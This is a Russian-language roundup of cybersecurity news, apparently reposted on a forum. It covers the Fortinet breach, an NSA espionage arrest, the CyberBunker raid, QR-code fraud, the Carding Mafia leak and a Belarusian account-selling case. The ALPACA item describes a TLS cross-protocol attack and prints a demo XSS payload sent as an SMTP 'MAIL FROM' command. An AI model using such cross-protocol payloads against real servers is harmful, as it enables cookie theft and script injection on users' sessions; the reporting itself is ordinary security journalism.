Fortinet - одна из крупнейших компаний в области кибербезопасности в мире, продающая безопасные сетевые продукты, такие как брандмауэры, маршрутизаторы и устройства VPN. Компания также предлагает решения для SIEM, сетевого управления и EDR/XDR, а также консалтинговые услуги.
Сегодня рано утром злоумышленник опубликовал на хакерском форуме сообщение о том, что они украли 440 ГБ данных из экземпляра Azure Sharepoint в Fortinet. Затем злоумышленник предоставил учетные данные для предполагаемого хранилища S3, где хранятся украденные данные, для загрузки другими злоумышленниками.
https://www.fortinet[.]com/blog/business-and-technology/notice-of-recent-
security-incident
https://www.bleepingcomputer[.]com/news/security/fortinet-confirms-data-
breach-after-hacker-claims-to-steal-440gb-of-files/
Арестованному грозит смертная казнь или пожизненное заключение.
Бывший сотрудник АНБ США арестован по обвинению в попытке продажи секретной информации иностранному шпиону, который на самом деле являлся агентом ФБР под прикрытием.
30-летний Джаре Себастьян Далке проработал в АНБ с 6 июня 2022 года по 1 июля 2022 года в качестве проектировщика безопасности IT-систем в рамках временного задания в Вашингтоне, округ Колумбия. Согласно показаниям ФБР, Далке имел допуск к секретной информации с 2016 года.
По словам Министерства юстиции США, в период с августа по сентябрь 2022 года Далке использовал зашифрованную учетную запись электронной почты для передачи выдержек из трех секретных документов, которые он получил во время своей работы, лицу, которое, по мнению Далке, работал на иностранное правительство.
Далке передал секретную информацию о национальной обороне (NDI) агенту ФБР под прикрытием в установленном месте в штате Колорадо, где он и был арестован 28 сентября. За свою информацию он запросил $85 000. Далке вел онлайн-переговоры, используя защищенное соединение, установленное ФБР в общественном месте в Денвере (штат Колорадо), что в конечном итоге привело к его аресту.
Некоторые из переданных фрагментов описывают планы АНБ по обновлению неназванной криптографической программы, а также оценку угроз, связанных с оборонными возможностями США и наступательными возможностями иностранного правительства.
Министерство юстиции США не назвала, с какой страной вел переговоры Далке. Однако, арестованный утверждал, что пытался установить контакт якобы через « заявку на .onion-сайте СВР ». Далке было предъявлено обвинение сразу по трем статьям Закона о шпионаже (Espionage Act), согласно которому наказанием является смертная казнь или лишение свободы сроком от нескольких лет до пожизненного заключения.
source:
justice[.]gov/opa/press-release/file/1539081/download
justice[.]gov/usao-co/pr/former-nsa-employee-arrested-espionage-related-
charges
В 1970-х годах армия ФРГ (западная часть Германии, которая, в противовес советской ГДР, существовала до падения Берлинской стены в 1989 году) построила подземный бункер недалеко от города Трабен-Трарбах у бельгийской границы. Большой и глубокий, он мог выдержать ядерный удар, а люди внутри могли долго выживать за счёт многочисленных запасов еды и воды. С 1978 по 2012 годы бункер служил штаб-квартирой военного метеорологического поздразделения, а внутри постоянно работали около 350 человек. Новички часто терялись в гигантских и одинаковых коридорах, а естественный свет туда никогда не попадал.
В 2012 году армия передислоцировала метеорологическое отделение, а немецкие власти выставили бункер на продажу за 350 тысяч евро (больше 30 миллионов рублей). Такая относительно небольшая цена объяснялась затратами, необходимыми для поддержания работы бункера. Периметр вокруг защищался забором, а на территории, помимо бункера, находились офисное здание, спутниковые антенны, вертолётная площадка и казармы, построенные ещё нацистами.
Власти надеялись, что территория заинтересует технологическую компанию или тематический отель, но потенциальные покупатели не находились, пока однажды с ними не связался 53-летний голландец Герман-Йохан Зент (Herman-Johan Xennt) с предложением купить бункер для «бизнеса, связанного с веб-хостингом», пообещав обеспечить работой сотни жителей близлежащего города. Несмотря на расплывчатую формулировку, местные власти согласились на сделку. Так или иначе, других желающих не нашлось. Историю предприимчивого голландца, ставшего звездой даркнета, рассказало издание The New Yorker.
Детская мечта, идеология свободного интернета и наркотики
Герман-Йохан родился в 1959 году в небольшом голландском городке Арнем, где проходили ожесточённые бои во время Второй мировой войны. Подростком он увлекался историческими зданиями, посещая заброшенные бункеры нацистов, а позже посмотрел «Звёздные войны» и переделал свою комнату под космический корабль. Странная фамилия Зент тоже пришла из тех годов — юноша сам придумал её, сменив отцовскую фамилию. Родители были не против, и вскоре они, как и все друзья подростка, называли его просто Зент.
В начале 1980-х он закончил колледж и занялся компьютерным бизнесом, погрузившись в него с головой. Тогда же Зент женился на голландке Анжелике, и у пары родились два сына. Впрочем, брак продержался недолго, и бизнесмен вновь ушёл в дела. В 1995 году он накопил достаточно денег, чтобы купить бывший бункер НАТО в окрестностях города Гус, который годом ранее местные власти выставили на продажу.
Внутри бункера Фото полицейского участка в Майнце
Это было необходимое вложение, ведь Зент уже задумал открыть новую компанию — CyberBunker, которая предлагала клиентам «пуленепробиваемый хостинг» для любых сайтов. В чём отличие от привычных хостингов вроде Amazon Web Services или крупнейшего регистратора доменных имён GoDaddy? За чуть более высокую цену Зент гарантировал максимально надёжную защиту материалов клиентов, даже если в них содержится деликатный или запрещённый контент.
Как итог, первыми большими клиентами компании становились порносайты. Бизнесмен относился к этому спокойно и говорил, что CyberBunker готовы предоставить хостинг всем, если только контент клиента не связан с детской порнографией или терроризмом. По словам бывшего владельца порносайта, который пользовался услугами компании, бизнес приносил ему около миллиона евро в год, но при этом сам Зент обычно не имел много денег — вместо этого он вкладывал всё в закупку новых серверов.
Бывший бункер НАТО он превратил в подобие огромной подростковой комнаты: повсюду стояли компьютеры, чёрные кожаные диваны, неоновые лампы и искусственные растения, а на фоне играла расслабляющая электроника. А несколько бывших сотрудников тех лет утверждают, что один из залов Зент оборудовал под «порно-комнату», где порой транслировались эротические хоум- видео с участием подружек бизнесмена.
Рабочее место одного из сотрудников CyberBunker
В 1999 году к команде Зента присоединился Свен Кампуис (Sven Kamphuis), который быстро стал одним из приближённых к главе компании благодаря таланту в программировании. Примерно в это же время глава CyberBunker предоставил в аренду часть бункера другой организации. Всё было хорошо вплоть до лета 2002 года, когда в бункере прогремел взрыв, в ходе которого Зенту обожгло лицо и руки. Прибывшая полиция обнаружила в руинах остатки лаборатории по созданию экстази. У компании отняли лицензию на работу в регионе, но Зенту не предъявили обвинения — он оправдался тем, что не знал о деятельности организации, работавшей с ними в одном бункере.
Взрыв и риск оказаться в тюрьме подтолкнул Зента к тому, чтобы озвучить свою новую идею — CyberBunker будет не просто компанией, а независимой Республикой. Он сам написал декларацию независимости, опираясь на постановления ООН от 1960 года, которое гласит, что каждый человек имеет право на самоопределение. С этой мыслью компания «отделилась» от Нидерландов, а Зент постановил, что валютой в Республике станут доллары, евро и золото.
Сам Зент становился верховным правителем CyberBunker. Это была не просто забава, но способ прорекламировать компанию — заявляя о своей «независимости» перед клиентами, компания давала понять, что придерживается «либеральных идей»: каждый человек должен иметь право пользоваться интернетом, а правительство как институт не должно вмешиваться в интернет.
Дата-центр CyberBunker Фото полицейского участка в Майнце
Годы спустя Зент объяснял, что декларация независимости CyberBunker была «шуткой», а он, составляя документ, не стремился влезать в политику, а лишь хотел вести бизнес без давления больших компаний и слежки «Большого брата». Тогдашние коллеги и друзья голландца описывали его как человека, глубоко понимающего устройство интернета, которому светила успешная карьера в Apple, если бы он не выбрал иную дорогу.
Незадолго до роста популярности PayPal Зент придумал его аналог Bank66, но задумка провалилась из-за «жадности и нехватки бизнес-хватки» у предпринимателя, объяснял его друг программист Фрэнк Ван дер Лоос (Frank Van der Loos). Но, несмотря на это и тот факт, что Зент умел кодить лишь на BASIC, люди вокруг него, включая Ван дер Лооса, считали его кладезем идей и даже более того — визионером.
Борьба с противниками и полицейский «хвост»
В 2013 году, когда Зент приобрёл бункер в Трабен-Трарбахе, он одновременно сделал два дела: дал клиентам компании понять, что готов и дальше вкладываться в безопасность их данных, и заинтересовал отдел по борьбе с киберпреступлениями. История CyberBunker особенно заинтересовала прокурора Йорга Ангерера (Jörg Angerer), который работал в немецком городе Кобленц, недалеко от Трабен-Трарбаха. Его офис, специализирующийся на киберпреступлениях, знал о нелегальной деятельности части клиентов Зента. Но на саму компанию у него ничего не было — она изящно работала в серой зоне активизма, бизнеса и криминала.
Окрепнув в начале нулевых, CyberBunker совместно с подпольным интернет- провайдером CB3ROB участвовала в массовых спам-рассылках с фишинговыми сайтами и предоставляла хостинг для сайтов по продаже лекарств без рецептов. В те же годы компания Зента хостила проект WikiLeaks Джулиана Ассанжа, который сливал в сеть секретные документы, в том числе о военных преступлениях армии США на Ближнем Востоке. Другой известный хостинг-клиент — The Pirate Bay, который оставался под крылом CyberBunker вплоть до 2010 года, когда по решению суда в Гамбурге компанию Зента вынудили отказаться от сотрудничества с пиратским сайтом.
Пока Ангерер продолжал копать, он выяснил, что CyberBunker не стесняется агрессии для защиты своих интересов. В 2010 году европейская волонтёрская организация Spamhaus Project, созданная для борьбы со спамом, начала собирать доказательную информацию против компании Зента, призывая крупных интернет- провайдеров разорвать всякие отношения с компанией. В 2013 году правая рука Зента, Свен Кампуис, вместе с группой неизвестных, называющих себя Stophaus Collective, организовал масштабную DDoS-атаку по Spamhaus Project, обвалив сайт проекта. В ходе расследования Кампуиса арестовали по подозрению в связи с атакой, но Зент, как и в прошлом, избежал наказания.
Старые телефоны и архивы, оставшиеся со времён немецкой армии
Следователя волновал и другой вопрос — зачем на самом деле Зент жил и работал в бункере под землёй. С точки зрения безопасности в этом нет особого смысла, так как, во-первых, такое решение неизбежно привлечёт внимание полиции. Во- вторых, гораздо выгоднее держать сервера не под защитой стен, способных выдержать ядерный удар, а в стране, куда не смогут дотянуться европейские власти — например, в России. Иными словами, в желании Зента было мало рационального. Друзья и знакомые говорят, что он всегда обожал бункеры. В голландском языке даже есть название таких людей — bunkergeil.
К 2013 году Ангерер знал, что CyberBunker замешана в нелегальной деятельности, но его команда собирала информацию ещё год. Всё дело в законах — в Германии не запрещено хостить сайт, содержащий незаконные материалы, если хостер не знает о запрещённом контенте и не оказывает активную помощь в его создании. Следователям требовалось иметь на руках как физические, так и цифровые доказательства связи компании с преступной деятельностью, и к 2015 году расследование перешло в активную фазу.
Полиции разрешили перехватывать весь трафик, исходящий из серверных в бункере, но только для слежения и копирования, чтобы команда Зента не заподозрила неладное. Решение быстро принесло плоды — примерно 10-15% перехватываемого трафика было не зашифровано, и полиция видела ссылки на сайты по продаже наркотиков, украденных банковских карт и прочие мошеннические схемы. Стало понятно — компания Зента вовсю обеспечивает работу даркнет-сайтов.
Общий бизнес с наркобароном и поддержка главных запрещённых даркнет-сайтов
При «правлении» Зента некогда военный бункер обрёл совершенно новую атмосферу. В нём одновременно находились больше 20 человек, включая программистов и техников из различных европейских стран, а также несколько постоянных девушек главы компании, его садовник (кому-то ведь надо было поливать растения и ухаживать за территорией на поверхности) и личный повар.
Работникам и гостям обычно предоставляли отдельные комнаты в старых нацистских бараках на поверхности. Сам же Зент спал исключительно под землёй в личной комнате с кроватью с чёрными атласными простынями, дорогой звуковой системой и фигуркой Железного Патриота (друг Железного человека) из комиксов Marvel в натуральную величину.
Фото полицейского участка в Майнце
В гостях у главы CyberBunker дважды был мэр Трабена-Трарбаха, который решил лично проверить слухи о том, что Зент занялся производством марихуаны в бункере. Ничего подобного он не нашёл.
На пятом подземном уровне бункера располагались резервуары с водой. На четвёртом были генераторы. На третьем суперкомпьютер, который использовала немецкая армия, всё ещё подключенный к огромному экрану. На том же этаже находились дата-центры, тепло от которых направлялось через вентиляционные отверстия и согревало бункер.
Через два года после покупки военного бункера Зент увидел новую бизнес- перспективу — производство специальных телефонов с технологией надёжного шифрования данных. Предположительно, его напарником в этом деле стал ирландский наркобарон Джордж Митчелл по прозвищу «Пингвин». Он сбежал из Великобритании в 1990-х годах после подозрения в связи с убийством в Лондоне и скрылся в Амстердаме, где он, с различными перерывами, продолжил заниматься наркоторговлей. С Зентом Митчелл был знаком ещё до CyberBunker, однако детали их отношений в прошлом туманны.
Вместе друзья начали производство телефонов с развитой технологией шифрования. По словам Зента, для первых моделей они использовали телефоны BlackBerry, а позже он разработал мессенджер Exclu, которые работает по новым схемам шифрования и доступен для смартфонов британского бренда Wileyfox, основанного в 2015 году. Бизнес по продаже телефонов с шифрованием стартовал с Ирландии и вскоре распространился по Европе. Зент рассказывал, что эта сфера оказалась куда выгоднее хостинг-бизнеса, однако проверить эти заявления пока невозможно. По данным ФБР, доходы от телефонного бизнеса вряд ли превышали миллион долларов в год.
Запасные батареи на случай отключения электричества в бункере
Митчелл как минимум несколько раз бывал в штаб-квартире CyberBunker, однако позже он, вероятно заподозрив слежку (его телефоны действительно прослушивали, а передвижения фиксировались) уехал из Трабен-Трарбаха и вновь исчез с полицейских радаров. Следователи решили вернуться к делу Зента, и хотя продажа телефонов с технологией шифрования не запрещена, как и хостинг даркнет-сайтов, полиция может построить дело против компании, если докажет, что CyberBunker содействует своим клиентам по распространения запрещённых материалов.
Чтобы добиться желаемого, отдел по борьбе с киберпреступлениями составил план. С разрешения немецких властей полиция создала собственный мошеннический даркнет-сайт, предлагающий поучаствовать в лотерее в обмен на стартовый взнос в биткоинах. Полиция намеренно создала сайт так, чтобы никто из случайных обманутых не мог потерять деньги, но в остальном сайт выглядел максимально убедительно. «Было весело его создавать», — анонимно признался один из членов команды.
Далее оперативники потратили несколько тысяч долларов на покупку биткоинов и связались с CyberBunker с просьбой об аренде сервера (компания принимала оплату только в криптовалюте). В ходе разговора с представителем проекта оперативники получили от него признание, что компания Зента помогает своим клиентам даже в тех случаях, если они занимаются запрещённой деятельностью. Бонусом сотрудник CyberBunker предложил полицейским поделиться несколькими советами о том, как эффективнее скрывать свою личность от властей.
Одна из кухонь в бункере
Параллельно с этим оперативники заслали в CyberBunker «крота». Предположительно (следователи отказались это комментировать), он воспользовался дырой в безопасности компании и подключил к серверам устройство, перехватывавшее трафик из серверных. Благодаря этому, а также другим методам, полиция решила, что имеет дело с крупнейшим хостером даркнета в Европе, а может и мире. В 2014 году проект хостил даркнет-сайт по продаже наркотиков Cannabis Road, а с 2016 по 2018 годы — форум Fraudsters, занимающийся мошенничеством с поддельными паспортами и деньгами.
С 2015 по 2018 годы среди клиентов CyberBunker был даркнет-площадка Flugsvamp, которая в ответе за примерно 90% всей онлайновой наркоторговли в Швеции. Самым крупным клиентом проекта Зента стал проект Wall Street Market — с 2016 по 2019 годы на нём продали наркотиков больше чем на 36 миллионов евро. С каждой продажи администрация забирала себе около 3%.
Именно Wall Street Market стал главным аккордом перед кульминацией. Пока в Германии готовили дело против компании Зента, другое немецкое подразделение совместно с оперативниками из Нидерландов и США готовились вывести из строя Wall Street Market и арестовать его основателей. По словам прокурора Йорга Ангерера, крайне необходимо было дождаться этого, прежде чем атаковать CyberBunker. «Провайдеры обеспечивают ресурсами настоящих преступников. Потому сначала нам нужно задержать именно их», — сказал он.
Операция против CyberBunker
В апреле 2019 года оперативники арестовали трёх немцев по обвинению в создании и управлении мошенническим сайтом Wall Street Market (на момент написания статьи обвиняемые ожидают суда). Вскоре после этого в бункер Зента нагрянули немецкие оперативники, забрали сервер, используемый сайтом, и ушли, не тронув ничего больше. Но ловушка захлопнулась — операция против CyberBunker перешла в финальную стадию.
26 сентября 2019 года все постоянные обитатели бункера, включая Зента, его сыновей (повзрослевшие, они работали вместе с отцом), новую девушку и садовника, покинули его, чтобы вместе поужинать. Для главы CyberBunker это был обычный день, и он не подозревал, что оперативники намеренно всё спланировали и знали — в этот день и это время бункер окажется пустым.
Примерно в 18:00, когда Зент и другие участники вечеринки принялись за еду, несколько оперативников под прикрытием схватили голландца, а дом, где проходила вечеринка, окружила полиция и вертолёт. В это же время начался штурм бункера — около сотни полицейских, включая немецкий спецназ, ворвались внутрь и, не встретив сопротивления, взяли штаб-квартиру CyberBunker под контроль. Впервые в истории Германии полиция задержала не самих торговцев на онлайн- площадках, а тех, кто «сделал их преступления возможным».
Предполагаемый владелец и оператор кибербункеров Герман Йохан Зент
Зента и большую часть его команды арестовали, но шесть подозреваемых сумели уйти. В этом числе правая рука Зента, Свен Кампуис, который предположительно в ответе за большую часть технической инфраструктуры компании. Но полиция не заинтересована в его поимке — у следствия недостаточно доказательств его участия в криминальной деятельности компании. Сам же Кампуис перебрался в голландский город Мидделбург, где его и нашёл журналист The New Yorker. Он заверил, что «кротом» в компании был не он, а один из менеджеров компании. Впрочем, здесь он, вероятно, ошибся — скорее всего, агентом под прикрытием всё это время был садовник.
***
С момента задержания Зент находится под арестом в Кобленце. Его адвокат не распространяется о стратегии защиты голландца в суде, но, судя по всему, он будет настаивать, что глава компании не был в курсе нелегальной деятельности CyberBunker. При этом в мае издание Der Spiegel со ссылкой на источники сообщило, что во время допроса на следующий день после ареста Зент признался, что был в курсе незаконной деятельности компании. Первое слушание по делу Зента пройдёт лишь осенью, спустя почти год с его ареста. Основная причина — задержки и карантинные меры из-за пандемии Covid-19.
Сложно до конца понять, в чём были истинные мотивы Зента. Оперативник, который мониторил его деятельность в течение нескольких лет, полагает, что беспринципность голландца сочеталась с утопическими взглядами. «Свободный интернет, свобода слова, никто не контролирует то, что там есть, и подобное. Это не ограбление банка. Да и не то чтобы он миллиардер», — сказал полицейский. Как говорит сестра Зента, Анна, его едва ли можно назвать криминальным гением. Напротив — это смышлёный, но мечтательный и отчасти наивный человек.
Родственница переживает, как тюрьма может повлиять на психику брата — сейчас он по большей части играет сам с собой в шахматы и почти не контактирует с внешним миром. В январе 2020 года отец Анны и Зента скончался, и адвокат обвиняемого просил разрешить ему посетить похороны. Суд отказал. Тогда Зент попросил предоставить ему ноутбук, чтобы посмотреть на трансляцию похорон, но и эту просьбу отклонили. Впрочем, ему позволили общаться по переписке с журналистом The New Yorker, и в одном из писем репортёр затронул особо личную тему Зента — тяга к бункерам.
По словам голландца, всё началось в детстве, когда он посетил военные комплексы, оставшиеся со времён битвы за Арнем в апреле 1945 года. Тогда совместные силы Великобритании и Канады выбили нацистские силы из города. Тот первый бункер CyberBunker в Гусе стал началом исполнения мечты Зента. Он хотел превратить это место в современную высокотехнологичную крепость, но дальше этого объяснить свою тягу к бункерам он не смог. «Почему кому-то нравятся гамбургеры? А кому-то мотоспорт? Я не могу на это ответить. Я просто люблю бункеры. Вот и всё».
Новый тип мошенничества с использованием QR-кодов набирает популярность за рубежом.
Мошенники научились грабить простых людей при помощи фейковых QR-кодов, расположенных в общественных местах. История женщины из Сингапура, потерявшей 20 тысяч долларов (около полутора миллионов рублей) собственных сбережений, вполне возможно, убережёт наших читателей от попадания в подобную ситуацию.
Как сообщает местное новостное издание The Straits Times, 60-летняя женщина увидела наклейку на входной двери в магазин «Bubble Tea», где предлагалось отсканировать QR-код, заполнить анкету на сайте и получить за это «бесплатную чашку чая с молоком». Как оказалось позже, данную наклейку налепили на дверь магазина именно злоумышленники, а само заведение никогда не проводило подобной акции.
Тем не менее, женщина не заподозрила ничего странного в требовании заполнить анкету и без колебаний отсканировала код. Однако она допустила фатальную ошибку на следующем этапе. Как выяснилось, QR-код вёл на скачивание стороннего приложения, и «заполнить анкету» нужно было именно там. Приложение, разумеется, оказалось полнофункциональным бэкдором с удалённым управлением смартфоном. Жертва не поняла этого и с радостью выдала приложению все необходимые разрешения и привилегии, ведь на кону чашка бесплатного чая!
Так как приложение обладало в том числе полномочиями записи экрана, а также удалённого управления устройством, мошенникам в течение дня удалось подсмотреть пин-код женщины от её банковского приложения, и поздно ночью, когда жертва уже спала, хакеры удалённо разблокировали смартфон и перевели на свой счёт 20 тысяч долларов с банковского счёта женщины. Вот вам и бесплатная чашка чая!
Как считают эксперты, распространение поддельных QR-кодов под видом настоящих, имеющих отношение к какой-либо организации, вызывающей доверие, — довольно хитрый способ обмануть жертв, поскольку потребители могут быть не в состоянии отличить законные QR-коды от мошеннических.
Между тем, подобный вид мошенничества уже добрался до США и Великобритании. Пострадавшие из Сан-Франциско утверждают, что злоумышленники оставляют на припаркованной машине потенциальной жертвы штраф-талон якобы за нарушения правил парковки. Талон содержит QR-код для оплаты штрафа, ведущий на, как это поначалу кажется, официальный сайт SFMTA (Муниципальное Транспортное Агентство Сан-Франциско).
Пример мошеннического штраф-талона
Забавно, что талон, который потенциальная жертва получила четвёртого мая, был датирован будущим временем, — пятым мая, что и стало причиной для подозрений. QR-код на приведённом талоне ведёт к ныне отключенной ссылке для сокращения URL, перенаправляющей посетителя на фишинговый веб-сайт, который полностью копирует внешний вид официального веб-сайта SFMTA, чтобы усыпить бдительность жертвы.
Сайт SFMTA: слева поддельный, справа настоящий
Дальнейшее расследование показало, что поддельный веб-сайт использовал форму веб-платежей Square для обработки мошеннических транзакций, а оплаченный жертвой «липовый» штраф улетал прямо в карман злоумышленников.
«Мы видим подобное мошенничество не впервые. В прошлый раз это были вредоносные QR-коды на парковочных счётчиках в Техасе», — написала журналистка Ким Зеттер, ссылаясь на конкретную известную аферу.
Местные органы власти Великобритании, включая совет острова Уайт, также предупреждают жителей остерегаться обнаруженных QR-кодов, которые могут быть замаскированы под опцию парковочного счетчика с быстрой оплатой. «Люди сканируют код и вводят данные своей кредитной карты, думая, что платят за парковочное место, но вместо этого попадают на поддельный веб-сайт, где мошенники фиксируют их платёжные данные», — поясняется в уведомлении .
Чтобы не стать жертвой подобного рода мошенничества, ни при каких обстоятельствах не стоит устанавливать на свой смартфон сомнительные приложения из сторонних источников. А если на каком-либо стороннем веб-сайте потребуется напрямую указать данные банковской карты, включая CVV-код, скорее всего, это мошенническая уловка. На большинстве российских сайтов, к примеру, обычно настроено перенаправление на популярные безопасные платёжные системы, у которых, как правило, уже есть данные банковской карты пользователя.
Группа исследователей из нескольких университетов Германии разработала новый метод MITM-атаки на HTTPS, дающий возможность извлечь Cookie с идентификаторами сеанса и другие конфиденциальные данные, а также добиться выполнения произвольного кода JavaScript в контексте другого сайта. Атака получила название ALPACA и может быть применена к TLS-серверам, реализующим разные протоколы прикладного уровня (HTTPS, FTPS, SMTP, IMAP, POP3), но использующим общие TLS-сертификаты.
Суть атаки в том, что при наличии контроля над сетевым шлюзом или точкой беспроводного доступа атакующий может перенаправить web-трафик на другой сетевой порт и организовать установку соединения с FTP или почтовым сервером, поддерживающими TLS-шифрование и использующими общий с HTTP-сервером TLS- сертификат, и браузер пользователя будет считать, что установлено соединение с запрошенным HTTP-сервером. Так как протокол TLS универсален и не привязан к протоколам прикладного уровня, установка шифрованного соединения для всех сервисов идентична и ошибка отправки запроса не к тому сервису может быть определена только уже после установки шифрованного сеанса во время обработки команд отправленного запроса.
Соответственно, если, например, перенаправить соединение пользователя, изначально адресованное к HTTPS, на почтовый сервер, в котором применяется общий с HTTPS-сервером сертификат, TLS-соединение будет успешно установлено, но почтовый сервер не сможет обработать переданные HTTP-команды и вернёт ответ с кодом ошибки. Данный ответ будет обработан браузером как ответ запрошенного сайта, переданный внутри корректно установленного шифрованного канала связи.
Предложено три варианта атаки:
• "Upload" для извлечения Cookie с параметрами аутентификации. Метод применим, если охватываемый TLS-сертификатом FTP-сервер позволяет загрузить и извлечь свои данные. В данном варианте атаки атакующий может добиться сохранения частей изначального HTTP-запроса пользователя, таких как содержимое заголовка Cookie, например, если FTP-сервер интерпретирует запрос как файл для сохранения или полностью журналирует входящие запросы. Для успешной атаки злоумышленнику требуется затем каким-то образом извлечь сохранённое содержимое. Атака применима к Proftpd, Microsoft IIS, vsftpd, filezilla и serv-u.
• "Download" для организации межсайтового скриптинга (XSS). Метод подразумевает, что атакующий в результате каких-то отдельных манипуляций может разместить данные в сервисе, использующем общий TLS-сертификат, которые затем можно выдать в ответ на запрос пользователя. Атака затрагивает вышеотмеченные FTP-серверы и IMAP/POP3-серверы (courier, cyrus, kerio-connect и zimbra). Например, подобный вариант атаки может быть применим к почтовым сервисам, предоставляющим доступ к сообщениям через web-интерфейс и через POP3/IMAP поверх TLS.
• "Reflection" для запуска JavaScript в контексте другого сайта. Метод основан на возвращении клиенту части запроса, в котором содержится отправленный атакующим JavaScript-код. Атака применима к вышеотмеченным FTP-серверам, IMAP- серверам cyrus, kerio-connect и zimbra, а также к SMTP-серверу sendmail.
Например, при открытии пользователем страницы, подконтрольной атакующим, с этой страницы может быть инициирован запрос ресурса с сайта, на котором у пользователя имеется активная учётная запись (например, bank.com). В ходе MITM-атаки этот запрос, адресованный web-сайту bank.com, можно перенаправить на почтовый сервер, в котором используется общий с bank.com TLS-сертификат. Так как почтовый сервер не завершает сеанс после первой ошибки, служебные заголовки и команды, такие как "POST / HTTP/1.1" и "Host:", будут обработаны как неизвестные команды (почтовый сервер вернёт на каждый заголовок "500 unrecognized command").
Почтовый сервер не разбирает особенности протокола HTTP и для него служебные заголовки и блок данных POST-запроса обрабатываются одинаково, поэтому в теле POST-запроса можно указать строку с командой почтовому серверу. Например, можно передать:
Code:Copy to clipboard
MAIL FROM: <script>alert(1);</script>
на что почтовый сервер вернёт сообщение об ошибке
Code:Copy to clipboard
501 <script>alert(1);</script>: malformed address: alert(1);</script> may not follow <script>
Этот ответ получит браузер пользователя, который выполнит JavaScript-код в контексте не изначально открытого сайта атакующего, а сайта bank.com, на который был отправлен запрос, так как ответ поступил внутри корректного TLS- сеанса, сертификат которого подтвердил подлинность ответа bank.com. Из браузеров подобная манипуляция сработает только в Internet Explorer и в старом Microsoft Edge (выпуски до перехода на движок Chromium), которые определяют наличие HTML/JavaScript в выдаваемом потоке, даже если ответ сервера не содержит корректного заголовка ("HTTP/1.1 200 OK"). Для того, чтобы заставить выполнить JavaScript в остальных браузерах необходимо обеспечить вывод корректного HTTP-ответа, например, это можно сделать при наличии доступа на запись на FTP-сервер при возможности вернуть содержимое сохранённого файла в ответ на запрос из браузера пользователя.
Сканирование глобальной сети показало, что проблеме в общем виде подвержены около 1.4 млн web-серверов, для которых возможно совершение атаки со смешиванием обращений по разным протоколам. Возможность реального совершения атаки определена для 119 тысяч web-серверов, для которых присутствовали сопутствующие TLS-серверы на базе других прикладных протоколов.
[Примеры эксплоитов подготовлены](https://github.com/RUB-NDS/alpaca- code/tree/master/exploits) для ftp-серверов pureftpd, proftpd, microsoft-ftp, vsftpd, filezilla и serv-u, IMAP- и POP3-серверов dovecot, courier, exchange, cyrus, kerio-connect и zimbra, SMTP-серверов postfix, exim, sendmail, mailenable, mdaemon и opensmtpd. Исследователями изучена возможность совершения атаки только в сочетании с серверами FTP, SMTP, IMAP и POP3, при этом не исключается, что проблема может проявляться и для других прикладных протоколов, использующих TLS.
Для блокирования атаки предложено использовать расширение ALPN (Application Layer Protocol Negotiation) для согласования TLS-сеанса с учётом прикладного протокола и расширение SNI (Server Name Indication) для привязки к имени хоста в случае применения TLS-сертификатов, охватывающих несколько доменных имён. На стороне приложений рекомендовано ограничить лимит на число ошибок при обработке команд, после достижения которого разрывать соединение. Процесс выработки мер по блокированию атаки начался ещё в октябре прошлого года. Подобные меры для защиты уже приняты в Nginx 1.21.0 (mail proxy), Vsftpd 3.0.4, Courier 5.1.0, Sendmail, FileZilla, crypto/tls (Go) и Internet Explorer.
На этой неделе специалисты агрегатора утечек Have I Been Pwned (HIBP) обнаружили, что в сеть попали данные пользователей известного кардерского форума Carding Mafia.

Судя по всему, форум был взломан, и в результате в открытый доступ просочилась информация о 297 744 пользователях (суммарно пользовательская база форума насчитывает около 500 000 человек). По информации HIBP, дамп включает в себя email-адреса, IP-адреса, имена пользователей и хешированные пароли (MD5).
Интересно, что на самом форуме Carding Mafia и его Telegram-канале пока не было никаких сообщений о компрометации и возможной утечке данных. Когда журналисты Vice Motherboard попытались связаться с администрацией сайта, им не ответили.
Основатель Have I Been Pwned Трой Хант рассказал изданию, что ему удалось подтвердить подлинность дампа. Так, специалист заметил в утекшей базе email- адреса Mailinator, службы, которая позволяет любому создавать одноразовые почтовые ящики. Хант использовал эти адреса на форуме, задействовав функцию «Я забыл пароль», и адреса оказались знакомы Carding Mafia, то есть ранее использовались для создания учетных записей на форуме.
«Еще одна история о том, как хакеры хакают хакеров», — прокомментировал Хант.
Click to expand...
Журналисты же отмечают, что в январе текущего года на другом хакерском форуме уже публиковались данные, предположительно украденные у Carding Mafia. То есть, вероятно, утечка могла произойти еще тогда.

Источник: xakep.ru/2021/03/26/carding-mafia-leak/
Главным следственным управлением Следственного комитета завершено расследование уголовного дела о незаконном распространении данных для доступа к счетам и электронным кошелькам.
Следователи установили, что 40-летний житель Минского района для улучшения своего финансового положения придумал «выгодную» схему заработка в виртуальном пространстве.
Еще в 2015 году мужчина узнал о том, что на продаже чужих учетных данных в интернете можно заработать и решил не оставаться в стороне. Правда заработок его был не совсем законный. В даркнете он приобретал данные учетных записей пользователей различных интернет-ресурсов, после чего продавал их в два, а то и в три раза дороже. Для реализации своего преступного плана в 2019 году он создал интернет-магазин на одной из торговых площадок по продаже цифровых продуктов. К слову, для того чтобы не терять деньги, в отдельных случаях мужчина сначала находил покупателей, а лишь потом подыскивал интересовавшие их данные.
Длительное время схема работала и приносила доход, но в августе 2022 года на след «горе-бизнесмена» вышли правоохранители.
Расследованием установлено, что за полгода до пресечения указанной деятельности обвиняемый совершил 350 эпизодов распространения данных для доступа к счетам и электронным кошелькам.
На следствии мужчина рассказал, что он специализировался на продаже аккаунтов зарубежных криптобирж, но и не брезговал реализовывать данные для доступа к страницам пользователей в социальных сетях. Также признался, что сознавал противоправность осуществляемых им действий, однако желание заработать превысило здравый смысл.
В ходе обыска по месту жительства фигуранта обнаружено и изъято около 100 тысяч долларов США, 28 банковских платежных карт, компьютерная техника и различные носители информации, на которых содержались следы его деятельности по реализации аккаунтов.
При проведении осмотра криптокошельков обвиняемого в них обнаружена крупная сумма токенизированных активов.
[](https://sk.gov.by/ru/news-
ru/view/zarabotal-bolshe-2-millionov-na-prodazhe-akkauntov-rassledovanie-
zaversheno-12280)[
](https://sk.gov.by/ru/news-
ru/view/zarabotal-bolshe-2-millionov-na-prodazhe-akkauntov-rassledovanie-
zaversheno-12280)[
](https://sk.gov.by/ru/news-
ru/view/zarabotal-bolshe-2-millionov-na-prodazhe-akkauntov-rassledovanie-
zaversheno-12280)[
](https://sk.gov.by/ru/news-
ru/view/zarabotal-bolshe-2-millionov-na-prodazhe-akkauntov-rassledovanie-
zaversheno-12280)
Главным следственным управлением разработан алгоритм вывода и конвертации
